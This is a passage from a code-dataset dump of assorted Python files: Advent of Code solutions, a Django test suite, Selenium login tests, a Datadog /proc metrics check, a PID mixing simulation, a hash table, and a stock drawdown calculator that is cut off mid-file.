removed')\n break\n else:\n print('Your list is empty. Nothing to remove') \n input('touch any key to return to the menu')\n elif choice == 5:\n if myList != []:\n myList.reverse()\n print('Now the order of your list has changed') \n\n elif choice == 6:\n if myList: \n myList.clear()\n print('Successfully clean up')\n input('touch any key to return to the menu')\n\n elif choice == 7:\n break\n else:\n print('Your choice should be between 1 and 7')","repo_name":"Sylva-Egb/learning_python","sub_path":"listScripting.py","file_name":"listScripting.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42352796052","text":"# https://pypi.org/project/anytree/\n\nclass Command:\n def __init__(self, string_list: list):\n self.type = string_list[1]\n self.argument = [x.strip() for x in string_list[2:]]\nclass Directory:\n def __init__(self, name:str, parent_dir):\n self.name = name\n self.children = {}\n self.size = 0\n self.parent = parent_dir\n\n def add_child(self, child, child_name):\n self.children.update({child_name: child})\n \n def update_size(self, added_size):\n self.size+=added_size\n if self.parent != None:\n self.parent.update_size(added_size)\n \n def print_dir(self, level):\n print(\"\\t\"*level, \"-\", self.name, \"(dir\", self.size, \")\")\n level +=1\n for k in self.children:\n child = self.children[k]\n if isinstance(child, File):\n print(\"\\t\"*(level), \"-\", child.name, \"(file \", child.size, \")\")\n else:\n child.print_dir(level)\n \n def get_dir_less_than_size(self, size, dir_list):\n for k in self.children:\n child = self.children[k]\n if isinstance(child, Directory):\n if child.size <= size:\n dir_list.append(child.size)\n child.get_dir_less_than_size(size, dir_list)\n \n\nclass File:\n def __init__(self, name:str, size:int, parent: Directory):\n self.name = name\n self.size = int(size.strip())\n self.parent = parent\n self.update_size(self.size)\n\n def update_size(self, size):\n self.parent.update_size(size) \n\nclass Filesystem:\n def add_root(self, root:Directory):\n self.root = root\n \n def print_fs(self):\n self.root.print_dir(0)\n \n def get_dir_less_than_size(self, size):\n dir_list=[]\n self.root.get_dir_less_than_size(size, dir_list)\n return dir_list\n\nfs = Filesystem()\ndef day7a(filepath):\n cursor_position = None\n with open(filepath) as f:\n for line in f:\n if cursor_position != None:\n print(cursor_position.name)\n string_list = line.split(' ')\n string_list = [x.strip() for x in string_list]\n if string_list[0]=='$':\n cmd = Command(string_list=string_list)\n print(\"line is command \", cmd.type)\n if cmd.type == \"cd\":\n dir_name = cmd.argument[0]\n print(dir_name)\n if dir_name == \"/\":\n root = Directory(\"root\", None)\n fs.add_root(root)\n cursor_position = root\n elif dir_name == \"..\":\n cursor_position = cursor_position.parent\n else:\n cursor_position = cursor_position.children[dir_name]\n else:\n if string_list[0] == \"dir\":\n dir_name = string_list[1]\n new_dir = Directory(dir_name, cursor_position)\n cursor_position.add_child(new_dir, dir_name)\n else:\n file_name = string_list[1]\n file_size = string_list[0]\n new_file = File(file_name, file_size, cursor_position)\n cursor_position.add_child(new_file, file_name)\n\n print(\"line is list\")\n fs.print_fs()\n list_dir = fs.get_dir_less_than_size(100000)\n return sum(list_dir)\n\ndef day7b(filepath):\n diskspace = 70000000\n update_space = 30000000\n list_dir = fs.get_dir_less_than_size(diskspace)\n occupied_space = fs.root.size\n free_space = diskspace-occupied_space\n space_to_be_freed = update_space-free_space\n suitable_dirs = [x for x in list_dir if x>= space_to_be_freed]\n print(\"occupied: \", occupied_space, \"free space\", free_space, \"to be freed\", space_to_be_freed)\n suitable_dirs.sort()\n print(suitable_dirs)\n return suitable_dirs[0]\n\nprint(day7a('day7_veronica.txt')) \nprint(day7b('day7_veronica.txt'))\n","repo_name":"Berenix90V/AdventOfCode2022","sub_path":"src/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7213826229","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 26 20:09:19 2020\n\n@author: wanxiangfan\n\"\"\"\n\nimport numpy as np#import statsmodels as sm\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n#dx005mm=np.loadtxt(\"dx=0.05mm.txt\") \nR=10**7\ndx02mm=np.loadtxt(\"dx=0.2mm.txt\")\ndx03mm=np.loadtxt(\"dx=0.3mm.txt\")\ndx04mm=np.loadtxt(\"dx=0.4mm.txt\")\ndx05mm=np.loadtxt(\"dx=0.5mm.txt\")\n#print(\"0.05 :\",sum(dx005mm))\n#print(dx05mm)\nprint(\"0.2 :\",sum(dx02mm))\nprint(\"0.3 :\",sum(dx03mm))\nprint(\"0.4 :\",sum(dx04mm))\nprint(\"0.5 :\",sum(dx05mm))\n#import statsmodels\n#print(statsmodels.__version__) \ndef polynomial1(x,a,b):\n return a*x**b\ndef ploynomial2(x,a):\n return a*x**4 \n \ndef fit_polynomial1(x,y,yerr): #fit N_3e -- dx space resolution\n #xerr = np.random.random_sample(10)\n fig, ax = plt.subplots()\n \n ax.errorbar(x, y,\n yerr=yerr,\n fmt='-o')\n \n ax.set_xlabel('dx (mm)')\n ax.set_ylabel('prob')\n ax.set_title('prob--space resolution')\n plt.show()\n \n plt.plot(x, y, 'b-', label='data') \n popt, pcov = curve_fit(polynomial1, x, y)\n print(popt)\n plt.plot(x, polynomial1(x, *popt), 'r-',\n label='fit: a=%f ,b=%f' % tuple(popt))#,b=%5.3f, c=%5.3f, d=%5.3f\n plt.xlabel('dx (mm)')\n plt.ylabel('prob')\n plt.legend()\n plt.show()\ndef fit_polynomial2(x,y,yerr): #fit N_3e -- dx space resolution\n #xerr = np.random.random_sample(10)\n fig, ax = plt.subplots()\n \n ax.errorbar(x, y,\n yerr=yerr,\n fmt='-o')\n \n ax.set_xlabel('dx (mm)')\n ax.set_ylabel('prob')\n ax.set_title('prob--space resolution')\n plt.show()\n \n plt.plot(x, y, 'b-', label='data') \n popt, pcov = curve_fit(ploynomial2, x, y)\n print(popt)\n plt.plot(x, ploynomial2(x, *popt), 'r-',\n label='fit: a=%f' % tuple(popt))#,b=%5.3f, c=%5.3f, d=%5.3f\n plt.xlabel('dx (mm)')\n plt.ylabel('prob')\n plt.legend()\n plt.show()\n \n\ndef CI(x): # confidence interval\n count = sum(x)\n #number of successes, can be pandas Series or DataFrame\n nobs= len(x)*R\n #total number of trials\n\n #alphafloat in (0, 1) significance level, default 0.05\n\n #method{'normal', 'agresti_coull', 'beta', 'wilson', 'binom_test'}\n #default: 'normal' method to use for confidence interval, currently available methods :\n ci_low, ci_upp = sm.stats.proportion_confint(count, nobs, alpha=0.95, method='wilson')\n #p = sum(x)/len(x)/R\n p = (ci_low+ci_upp)/2\n p_err = abs(ci_low-ci_upp)/2\n return [p,p_err]#, ci_low, ci_upp\nL = [dx02mm,dx03mm,dx04mm,dx05mm]\np_with_err= np.array([CI(L[i]) for i in range(len(L))])\nprint(np.transpose(p_with_err)[0])\n#for i in L: \n #p, p_err = CI(i)\n # print('p', 'ci_low', 'ci_upp')\n # print(p, ci_low, ci_upp)\n #x=np.array([0.2,0.3,0.4,0.5])\n #y=np.array([bernoulli(dx02mm),bernoulli(dx03mm),bernoulli(dx04mm),bernoulli(dx05mm)])\n #print (y)\n\n\n\n# test data and error\nx = np.array([0.2,0.3,0.4,0.5])\ny,y_err = np.array(np.transpose(p_with_err)[0]),np.array(np.transpose(p_with_err)[1])\n#fit_polynomial1(x=x,y=y,yerr=y_err)\nfit_polynomial1(x=x,y=y,yerr=y_err)","repo_name":"Fanwanxiang/mu3e_project","sub_path":"cone_simulation/original_file_simulate_coincidence_at_diff_dx/load_txt_analysis_prob_vs_dx.py","file_name":"load_txt_analysis_prob_vs_dx.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26042935915","text":"\"\"\"\nGeneral idea: solve recursively from n = 0 to N where N = number of iterations derived from time / Tp\nIf spare time is found, try going from N to 0 to see how much memory its gonna hog\nStarting conditions (can be changed later):\n\nV(0)=V0\nV(n+1)=(Qd1(n)+Qd2(n)-Q0(n))*Tp+V(n)\nc(0)=c0\nc(n+1)=(Qd1(n)*(cd1(n)-c(n))+Qd2(n)*(cd2(n)-c(n)))*Tp/V(n)+c(n)\n\nwhere:\nc = concentration of ingredient\nQd = inflow of # ingredient\nQo = outflow of solution\nV = volume of solution\n\"\"\"\n\n\ndef convertToPerUnitTime(arg):\n # we have everything in something per minute, here we convert to per iteration\n return arg / 60\n\n\ndef createKeyMomentsTable():\n # tmp[[n,c,V],...]\n tmp = [[0, c[0], V[0]]]\n for n in range(len(c)):\n if n == 0:\n continue\n deltaC = c[n] - c[n - 1]\n deltaV = V[n] - V[n - 1]\n threshC = 0.01\n threshV = 0.12\n if deltaV >= threshV or deltaC >= threshC:\n tmp.append([n, c[n], V[n]])\n return tmp\n\n\nfrom tools import PIDController as PID_Controller\n\n# main start\n\n# constraints\nvMax = 2000 # maximum length of container in meters\ncMax = 1 # maximum concentration, if c>cMax, then sth is wrong\n\n# parameters\n\n# starting volume (m^3)\nV = [10]\n# starting concentration\nc = [0.1]\n# target concentration\ntarget_c = 0.25\n# sampling time/step time (in seconds)\nTp = 0.5\n# concentration of ingredient 1\ncd1 = [0.5]\n# concentration of ingredient 2\ncd2 = [0.2]\n# simulationLength (in hours)\nsimulationLength = 1\n# inflow of first ingredient, for now constant (m^3/m)\nQd1 = [convertToPerUnitTime(5)]\n# inflow of second ingredient, for now constant (m^3/m)\nQd2 = [convertToPerUnitTime(3)]\n# outflow, I thought it'd be Beta*sqrt(h(n)) but apparently it's const (m^3/m)\nQo = [convertToPerUnitTime(5)]\n\n# additional variables\ne1 = [target_c - c[0]]\nde1 = [0]\ndde1 = [0]\nu1 = [0]\ne2 = [0]\nde2 = [0]\ndde2 = [0]\nu2 = [0]\nu2_unconstrained = [0]\n\n# input cap\nmaxInflow = convertToPerUnitTime(10)\n\n# PID controller data\nfPID = open(\"PIDFillingSettingsConc\", \"r\")\nPID_conc = PID_Controller.PIDController(float(fPID.readline()), float(fPID.readline()),\n float(fPID.readline()),\n Tp)\n\nfPID = open(\"PIDFillingSettingsFlow\", \"r\")\nPID_flow = PID_Controller.PIDController(float(fPID.readline()), float(fPID.readline()), float(fPID.readline()),\n Tp)\n\nfConcDiag = open(\"PID_conc_diagnostic.txt\", \"w\")\nfConcDiag.write(\"e\\tde\\tdde\\tu1\\n\")\n\nfVolDiag = open(\"PID_vol_diagnostic.txt\", \"w\")\nfVolDiag.write(\"e\\tde\\tdde\\tu2\\n\")\n\n# 1: calculate number of iterations\niterations = int(3600 * simulationLength / Tp)\n\nf = open(\"ctrl_mix.txt\", \"w\")\n# f.write(\"number of iterations: \")\n# f.write(str(iterations))\n# f.write(\"\\n\")\nf.write(\"n\\t\")\nf.write(\"water volume V\\t\")\nf.write(\"water input Qd1\\t\")\nf.write(\"water input Qd2\\t\")\nf.write(\"water output Qo\\t\")\nf.write(\"concentration c\\t\")\nf.write(\"concentration cd1\\t\")\nf.write(\"concentration cd2\\n\")\n\nf.write(\"0\\t\")\nf.write(str(V[0]) + \"\\t\")\nf.write(str(Qd1[0]) + \"\\t\")\nf.write(str(Qd2[0]) + \"\\t\")\nf.write(str(Qo[0]) + \"\\t\")\nf.write(str(c[0]) + \"\\t\")\nf.write(str(cd1[0]) + \"\\t\")\nf.write(str(cd2[0]) + \"\\n\")\n\n# 2:loop\nfor n in range(iterations + 1):\n # skip step n = 0\n if n == 0:\n continue\n e1.append(target_c - c[n - 1])\n de1.append(e1[n - 1] - e1[n - 2])\n\n if n < 2:\n dde1.append(de1[n])\n else:\n dde1.append(e1[n - 1] - 2 * e1[n - 2] + e1[n - 3])\n\n tmp_u1 = PID_conc.calc_delta_u(de1[n], e1[n], dde1[n]) + u1[n - 1]\n #if tmp_u1 < 0:\n #tmp_u1 = 0\n u1.append(tmp_u1)\n # u1.append(PID_conc.calc_delta_u(de1[n], e1[n], dde1[n]))\n # u1.append(PID_conc.calc_delta_u(de1[n], 0, dde1[n]))\n # u1[n] += u1[n - 1]\n\n # u1 is x2, x2 - y2 = e2, y2 is V[0]\n e2.append(u1[n] - u1[n - 1])\n de2.append(e2[n] - e2[n - 1])\n\n if n < 2:\n dde2.append(de2[n])\n else:\n dde2.append(e2[n] - 2 * e2[n - 1] + e2[n - 2])\n\n tmp_u2 = PID_flow.calc_delta_u(de2[n], e2[n], dde2[n]) + u2[n - 1]\n if tmp_u2 < 0:\n tmp_u2 = 0\n u2.append(tmp_u2)\n \"\"\"\n u2.append(PID_flow.calc_delta_u(de2[n], e2[n], dde2[n]))\n u2[n] += u2[n - 1]\n \"\"\"\n\n u2_unconstrained.append(u2[n])\n if u2[n] > maxInflow:\n u2[n] = maxInflow\n if u2[n] <= 0:\n u2[n] = 0\n Qd1.append(u2[n])\n # Qo.append(Qd1[n] + Qd2[0])\n print(\"Qd1: \", Qd1[n])\n # all of unchanging constants have been swapped for direct indexes\n # modified model\n Qo[0] = Qd1[n] + Qd2[0]\n VNext = (Qd1[n] + Qd2[0] - Qo[0]) * Tp + V[n - 1]\n if VNext > vMax:\n print('Container overflowed! Happened at iteration = ', n)\n f.write(\"Error, overfilled!\\n\")\n f.close()\n break\n if VNext < 0:\n print('Container empty! Happened at iteration = ', n)\n f.write(\"Error, empty!\\n\")\n f.close()\n break\n V.append(VNext)\n aa = Qd1[n - 1] * (cd1[0] - c[n - 1])\n bb = Qd2[0] * (cd2[0] - c[n - 1])\n delta = (aa + bb) * Tp / V[n - 1]\n cNext = delta + c[n - 1]\n if cNext > cMax:\n print('Concentration too high!')\n f.write(\"Error, concentration above 100%!\\n\")\n f.close()\n break\n c.append(cNext)\n f.write(str(n) + \"\\t\")\n f.write(str(VNext) + \"\\t\")\n f.write(str(Qd1[n]) + \"\\t\")\n f.write(str(Qd2[0]) + \"\\t\")\n f.write(str(Qo[0]) + \"\\t\")\n f.write(str(cNext) + \"\\t\")\n f.write(str(cd1[0]) + \"\\t\")\n f.write(str(cd2[0]) + \"\\n\")\n\n sentence = \" \".join([str(e1[n]), \"\\t\", str(de1[n]), \"\\t\", str(dde1[n]), \"\\t\", str(u1[n]), \"\\n\"])\n fConcDiag.write(sentence)\n sentence = \" \".join([str(e2[n]), \"\\t\", str(de2[n]), \"\\t\", str(dde2[n]), \"\\t\", str(u2[n]), \"\\n\"])\n fVolDiag.write(sentence)\n\nfinalScore = createKeyMomentsTable()\nf.close()\n","repo_name":"HubNeu/PIDWithMachineLearning","sub_path":"programs/controlled_mixing_old.py","file_name":"controlled_mixing_old.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"43001284951","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom posts.models import Group, Post, Comment\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='Тестовый слаг',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовая пост',\n )\n\n cls.test_model = (\n (cls.group, cls.group.title),\n (cls.post, cls.post.text[:15]),\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.post.author,\n text='Новая запись!',\n )\n\n def test_models_str_return(self):\n \"\"\"Проверка работы метода __str__ моделей.\"\"\"\n for model_name, str_value in PostModelTest.test_model:\n with self.subTest(model_name=model_name):\n self.assertEqual(str(model_name), str_value)\n\n def test_title_label_post(self):\n \"\"\" Проверка verbose_name при создании поста.\"\"\"\n task = PostModelTest.post\n verbose = task._meta.get_field('group').verbose_name\n self.assertEqual(verbose, 'Группа')\n\n def test_title_help_text_post(self):\n \"\"\" Проверка help_text при выборе группы.\"\"\"\n task = PostModelTest.post\n help_texts = task._meta.get_field('group').help_text\n self.assertEqual(help_texts, 'Выберите название группы')\n\n def test_title_label_group(self):\n \"\"\" Проверка наличия verbose_name при создании группы.\"\"\"\n task = PostModelTest.group\n verbose = task._meta.get_field('title').verbose_name\n self.assertEqual(verbose, 'Заголовок группы')\n\n def test_title_help_text_group(self):\n \"\"\" Проверка наличия help_text при создании группы.\"\"\"\n task = PostModelTest.group\n help_texts = task._meta.get_field('title').help_text\n self.assertEqual(help_texts, 'Укажите заголовок группы')\n\n def test_comment_author_help_text(self):\n \"\"\" Проверка наличия help_text (подсказки), в поле author\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('author').help_text\n self.assertEqual(verbose, 'Автор отображается на сайте')\n\n def test_comment_post_help_text(self):\n \"\"\" Проверка наличия help_text (подсказки), в поле post\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('post').help_text\n self.assertEqual(verbose, 'Под каким постом оставлен комментарий')\n\n def test_comment_post_verbose_name(self):\n \"\"\" Проверка наличия verbose_name, в поле post\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('post').verbose_name\n self.assertEqual(verbose, 'Пост')\n\n def test_comment_author_verbose_name(self):\n \"\"\" Проверка наличия verbose_name, в поле author\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('author').verbose_name\n self.assertEqual(verbose, 'Автор комментария')\n","repo_name":"RinatMukhaev/hw05_final","sub_path":"yatube/posts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7761053005","text":"import pytest\nimport time\n\nbase_url = 'https://dev.pbees.party'\nuser_details = {\"email\": \"psureshkumarece@gmail.com\", \"password\": \"password\"}\n\n# base_url = 'https://storyweaver.org.in/'\n\ndef test_guest_create(setUp):\n browser = setUp\n basePage = browser.base_page()\n homePage = browser.home_page()\n basePage.navigate_to_url(base_url)\n homePage.click_create_link()\n assert homePage.is_login_poup() == True\n\ndef test_create_story_without_images(setUp):\n browser = setUp\n basePage = browser.base_page()\n loginPage = browser.login_page()\n homePage = browser.home_page()\n createPage = browser.create_page()\n basePage.navigate_to_url(base_url)\n time.sleep(5)\n loginPage.login_with(user_details)\n basePage.wait_for_page_to_load()\n time.sleep(2)\n homePage.click_create_link()\n time.sleep(2)\n assert createPage.is_create_page() == True\n new_book_data = {'title': 'suresh'}\n createPage.fill_new_book_popup(new_book_data)\n time.sleep(5)\n createPage.click_publish()\n time.sleep(5)\n error_flag = createPage.is_validation_error()\n assert error_flag == True","repo_name":"sureshpathipati/pyauto","sub_path":"create_story_test.py","file_name":"create_story_test.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11074791375","text":"# (C) Cory Watson 2016\n# (C) Datadog, Inc. 2016-present\n# All rights reserved\n# Licensed under Simplified BSD License (see LICENSE)\n\nfrom collections import defaultdict\n\nfrom six import iteritems\n\nfrom datadog_checks.base import AgentCheck\nfrom datadog_checks.base.utils.subprocess_output import get_subprocess_output\n\ntry:\n import datadog_agent\nexcept ImportError:\n from datadog_checks.base.stubs import datadog_agent\n\n\nPROCESS_STATES = {\n 'D': 'uninterruptible',\n 'R': 'runnable',\n 'S': 'sleeping',\n 'T': 'stopped',\n 'W': 'paging',\n 'X': 'dead',\n 'Z': 'zombie',\n}\n\nPROCESS_PRIOS = {'<': 'high', 'N': 'low', 'L': 'locked'}\n\n\nclass MoreUnixCheck(AgentCheck):\n def __init__(self, *args, **kwargs):\n super(MoreUnixCheck, self).__init__(*args, **kwargs)\n self.tags = self.instance.get('tags', [])\n self.set_paths()\n\n def check(self, instance):\n self.get_inode_info()\n self.get_stat_info()\n self.get_entropy_info()\n self.get_process_states()\n if self.instance.get('include_interrupt_metrics', False):\n self.get_interrupts_info()\n\n def set_paths(self):\n proc_location = (datadog_agent.get_config('procfs_path') or '/proc').rstrip('/')\n\n self.proc_path_map = {\n \"inode_info\": \"sys/fs/inode-nr\",\n \"stat_info\": \"stat\",\n \"entropy_info\": \"sys/kernel/random/entropy_avail\",\n \"interrupts_info\": \"interrupts\",\n }\n\n for key, path in iteritems(self.proc_path_map):\n self.proc_path_map[key] = \"{procfs}/{path}\".format(procfs=proc_location, path=path)\n\n def get_inode_info(self):\n with open(self.proc_path_map['inode_info'], 'r') as inode_info:\n inode_stats = inode_info.readline().split()\n self.gauge('system.inodes.total', float(inode_stats[0]), tags=self.tags)\n self.gauge('system.inodes.used', float(inode_stats[1]), tags=self.tags)\n\n def get_stat_info(self):\n with open(self.proc_path_map['stat_info'], 'r') as stat_info:\n lines = [line.strip() for line in stat_info.readlines()]\n for line in lines:\n if line.startswith('ctxt'):\n ctxt_count = float(line.split(' ')[1])\n self.monotonic_count('system.linux.context_switches', ctxt_count, tags=self.tags)\n elif line.startswith('processes'):\n process_count = int(line.split(' ')[1])\n self.monotonic_count('system.linux.processes_created', process_count, tags=self.tags)\n elif line.startswith('intr'):\n interrupts = int(line.split(' ')[1])\n self.monotonic_count('system.linux.interrupts', interrupts, tags=self.tags)\n\n def get_entropy_info(self):\n with open(self.proc_path_map['entropy_info'], 'r') as entropy_info:\n entropy = entropy_info.readline()\n self.gauge('system.entropy.available', float(entropy), tags=self.tags)\n\n def get_process_states(self):\n state_counts = defaultdict(int)\n prio_counts = defaultdict(int)\n ps = get_subprocess_output(['ps', '--no-header', '-eo', 'stat'], self.log)\n for state in ps[0]:\n # Each process state is a flag in a list of characters. See ps(1) for details.\n for _ in list(state):\n if state in PROCESS_STATES:\n state_counts[PROCESS_STATES[state]] += 1\n elif state in PROCESS_PRIOS:\n prio_counts[PROCESS_PRIOS[state]] += 1\n\n for state in state_counts:\n state_tags = list(self.tags)\n state_tags.append(\"state:\" + state)\n self.gauge('system.processes.states', float(state_counts[state]), state_tags)\n\n for prio in prio_counts:\n prio_tags = list(self.tags)\n prio_tags.append(\"priority:\" + prio)\n self.gauge('system.processes.priorities', float(prio_counts[prio]), prio_tags)\n\n def get_interrupts_info(self):\n with open(self.proc_path_map['interrupts_info'], 'r') as interrupts_info:\n lines = [line.strip() for line in interrupts_info.readlines()]\n cpu_count = len(lines[0].split())\n for line in lines[1:]:\n parts = line.split()\n irq_id = parts[0].replace(\":\", \"\")\n for cpu_id, part in enumerate(parts[1 : cpu_count + 1]):\n irq_count = int(part)\n tags = self.tags + ['irq:{}'.format(irq_id), 'cpu_id:{}'.format(cpu_id)]\n self.monotonic_count(\"system.linux.irq\", irq_count, tags=tags)\n","repo_name":"DataDog/integrations-core","sub_path":"linux_proc_extras/datadog_checks/linux_proc_extras/linux_proc_extras.py","file_name":"linux_proc_extras.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":820,"dataset":"github-code","pt":"83"} +{"seq_id":"70802222672","text":"# A super simple implementation of a hash table in python\n# Uses list-of-lists approach w/ closed addressing\n\nclass MyHashTable(object):\n\n def __init__(self, table_length: int):\n self.table_length = table_length\n self.table = [[] for i in range(table_length)]\n\n\n # for given key, create a hash code using python's built-in hash()\n # note: this hash code is independent of length of table\n def get_hash_code(self, key) -> int:\n return hash(str(key))\n\n\n # for given hash code, return the corresponding index of the \"table\" list\n def h(self, hash_code) -> int:\n return hash_code % self.table_length\n\n\n # lookup and return the value using the given key\n def get(self, key):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n for t in self.table[index]:\n if t[0] == key:\n return t[1]\n\n return None\n\n\n # check to see if a given key exists in hash table\n def find(self, key):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n for t in self.table[index]:\n if t[0] == key:\n return True\n\n return False\n\n\n # insert a new (key, value) pair into the hash table\n def insert(self, key, value):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n\n # if key already exists in table, error\n for t in self.table[index]:\n assert t[0] != key, \"Key already present in hash table; try update(key, value) instead.\"\n\n self.table[index].append((key, value))\n\n\n # change the value in table of key to given new_\n def update(self, key, new_value):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n\n for t in self.table[index]:\n if t[0] == key:\n self.table[index].remove(t)\n self.table[index].append((key, new_value))\n return\n\n assert False, \"Key not present in hash table; try insert(key, value) instead.\"\n\n\n # remove element with given key from the hash table\n def remove(self, key):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n for t in self.table[index]:\n if t[0] == key:\n self.table[index].remove(t)\n return\n\n assert False, \"Key not present in hash table; could not delete\"\n\n\n # convert hash table to string and return\n def to_string(self):\n ht = ''\n for row in self.table:\n ht += (str(row) + \"\\n\")\n\n return ht\n","repo_name":"grahamplace/etudes","sub_path":"python/data_structures/hash_table/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"16714731454","text":"#!/usr/bin/env python3\n\n\"\"\"\nugh. this has an \"off by one\" error somewhere... the max string value is +/- 1\n\"\"\"\n\nimport collections\nimport copy\nimport fileinput\nimport pprint\nimport re\nimport statistics\nimport sys\nimport typing\n\n\ndef main() -> None:\n base = None\n pair_changes: typing.Dict[str, str] = {}\n for line in fileinput.input():\n if base is None:\n base = line.strip()\n continue\n if len(line.strip()) == 0:\n continue\n words = line.strip().split(\" -> \")\n lhs = words[0]\n rhs = lhs[0] + words[1] + lhs[1]\n pair_changes[lhs] = rhs\n\n current_pairs: typing.Dict[str, int] = collections.defaultdict(int)\n for idx, letter in enumerate(base):\n try:\n pair = letter + base[idx+1]\n except IndexError:\n continue\n current_pairs[pair] += 1\n for step in range(40):\n # print(f\"step {step + 1}\")\n new_pairs: typing.Dict[str, int] = collections.defaultdict(int)\n for pair in list(current_pairs):\n three_letter = pair_changes[pair]\n new_pairs[three_letter[0:2]] += current_pairs[pair]\n new_pairs[three_letter[1:3]] += current_pairs[pair]\n # if step in (0, 1):\n # print(f\"base {base}\")\n # print(f\"current_pairs {repr(current_pairs)}\")\n # print(f\"new_pairs {repr(new_pairs)}\")\n current_pairs = new_pairs\n\n counting: typing.Dict[str, int] = collections.defaultdict(int)\n for pair in current_pairs:\n counting[pair[0]] += current_pairs[pair]\n counting[base[-1]] += 1\n\n max_l = max(counting, key=counting.get)\n min_l = min(counting, key=counting.get)\n max_l_val = counting[max_l]\n min_l_val = counting[min_l]\n print(f\"max letter {max_l} -> {max_l_val} min letter {min_l} -> {min_l_val} result {max_l_val - min_l_val}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zapman449/AdventOfCode","sub_path":"2021/day14/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10024747270","text":"import datetime\nimport csv\nfrom redminelib import Redmine\nfrom redminelib.exceptions import ResourceNotFoundError\n\nredmine = Redmine('https://xxxxxxxxxxxxx', key='xxxxxxxxxxxxxx')\n#APIキーを入力\n\nissues = redmine.issue.filter(\n project_id='xx',\n cf_x='aa|bb',\n tracker_id='xx'\n)\nfor issue in issues:\n values = [x['value'] for x in issue.custom_fields if x['id'] == xx]\n value = ip_addresses[0] if len(ip_addresses) else ''\n print ('%d:%s:%s' % (issue.id, issue.subject, value))\n","repo_name":"beaverjr/til","sub_path":"python/python-rdm-example.py","file_name":"python-rdm-example.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74310721552","text":"import requests\nimport traceback\nimport pandas as pd\nimport numpy as np\nimport time\nimport os\nfrom update.util.dbConnect import insert_data, exec_query\nfrom datetime import datetime, timedelta\nfrom itertools import groupby\n\n\ndef load_required_df():\n \"\"\" mdd 업데이트에 필요한 df 추출 \"\"\"\n # 가장 최근 업데이트 날짜 추출\n mdd_latest_date = exec_query(f'select max(date) from stock_db.d_mdd')\n if len(mdd_latest_date) != 0:\n mdd_latest_date = mdd_latest_date[0][0]\n else:\n mdd_latest_date = '20000101'\n\n # 가장 최근으로부터 2년 전 시점부터 데이터 추출\n from_date = str(datetime.strptime(mdd_latest_date, '%Y%m%d').date() - timedelta(days=365 * 2 + 30)).replace(\"-\", \"\")\n\n # 필요한 기간의 데이터 추출\n price = pd.DataFrame(\n exec_query(f'select `stock_cd`, `date`, `price` from stock_db.d_stock_price where date > {from_date}'))\n price.columns = ['stock_cd', 'date', 'price']\n\n return price, mdd_latest_date\n\n\ndef cal_mdd(stock_pr, month):\n \"\"\" n달 간의 종목가격이 주어졌을 때 그 기간의 mdd를 return \"\"\"\n mdd = []\n\n for i in range(len(stock_pr) - (21 * month)):\n price_part = stock_pr[i:(i + 21 * month + 1)]\n try:\n max_price = max(price_part)\n min_price = min(price_part)\n mdd_part = (min_price - max_price) / max_price\n except:\n mdd_part = [None]\n mdd += [mdd_part]\n\n return mdd\n\n\ndef cal_mdd2(price_wide, month, mdd_latest_date):\n \"\"\" cal_mdd를 column wise 하게 df에 적용하여 tidy form의 결과물을 return \"\"\"\n\n from_index = int(np.where(price_wide.index == mdd_latest_date)[0]) - 21 * month\n price_wide = price_wide.iloc[from_index:, ]\n\n mdd_wide = price_wide.apply(lambda x: cal_mdd(x, month), axis=0, result_type='expand')\n mdd_wide.index = price_wide.tail(len(mdd_wide)).index\n mdd_long = mdd_wide.reset_index().melt(id_vars=\"date\", var_name=\"stock_cd\", value_name=\"mdd\").dropna()\n mdd_long = mdd_long[['stock_cd', 'date', \"mdd\"]]\n colname = \"mdd_\" + str(month) + \"m\"\n mdd_long = mdd_long.rename(columns={'mdd': colname})\n\n return mdd_long\n\n\ndef return_mdd_set(price, mdd_latest_date):\n \"\"\" 계산 가능한 시기의 mdd를 return 